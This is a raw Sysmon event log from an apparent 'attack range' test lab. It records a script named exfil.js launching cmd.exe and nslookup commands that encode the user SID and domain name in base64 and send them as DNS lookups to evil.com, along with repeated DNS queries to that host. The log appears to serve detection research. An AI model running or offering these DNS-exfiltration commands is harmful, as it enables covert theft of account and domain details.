Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.889{2E1864BB-18E6-629A-EE42-000000005F02}30848140C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-F042-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.892{2E1864BB-18E6-629A-F042-000000005F02}4832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-EE42-000000005F02}3084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkuab.tmp 2>&1 10341000x8000000000000000207189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.871{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-EF42-000000005F02}6984C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.870{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-EF42-000000005F02}6984C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-18E6-629A-EF42-000000005F02}69846008C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-EE42-000000005F02}3084C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-EF42-000000005F02}6984C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.836{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-EE42-000000005F02}3084C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.836{2E1864BB-18E0-629A-6742-000000005F02}39761220C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-EE42-000000005F02}3084C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.851{2E1864BB-18E6-629A-EE42-000000005F02}3084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkuab.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.836{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmnai.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-18E6-629A-EC42-000000005F02}74162260C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-ED42-000000005F02}2104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-ED42-000000005F02}2104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.820{2E1864BB-18E6-629A-EB42-000000005F02}81285064C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-ED42-000000005F02}2104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.823{2E1864BB-18E6-629A-ED42-000000005F02}2104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-EB42-000000005F02}8128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmnai.tmp 2>&1 22542200x8000000000000000207169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.840{00000000-0000-0000-0000-000000000000}5044evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.782{00000000-0000-0000-0000-000000000000}7340evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.719{00000000-0000-0000-0000-000000000000}4936evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.646{00000000-0000-0000-0000-000000000000}5384evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.577{00000000-0000-0000-0000-000000000000}7388evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.516{00000000-0000-0000-0000-000000000000}488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.454{00000000-0000-0000-0000-000000000000}1400evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.362{00000000-0000-0000-0000-000000000000}5592evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.295{00000000-0000-0000-0000-000000000000}6580evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.231{00000000-0000-0000-0000-000000000000}508evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.160{00000000-0000-0000-0000-000000000000}5704evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.080{00000000-0000-0000-0000-000000000000}2928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.999{00000000-0000-0000-0000-000000000000}7296evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000207156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.926{00000000-0000-0000-0000-000000000000}7620evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000207155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.805{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-EC42-000000005F02}7416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.805{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-EC42-000000005F02}7416C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 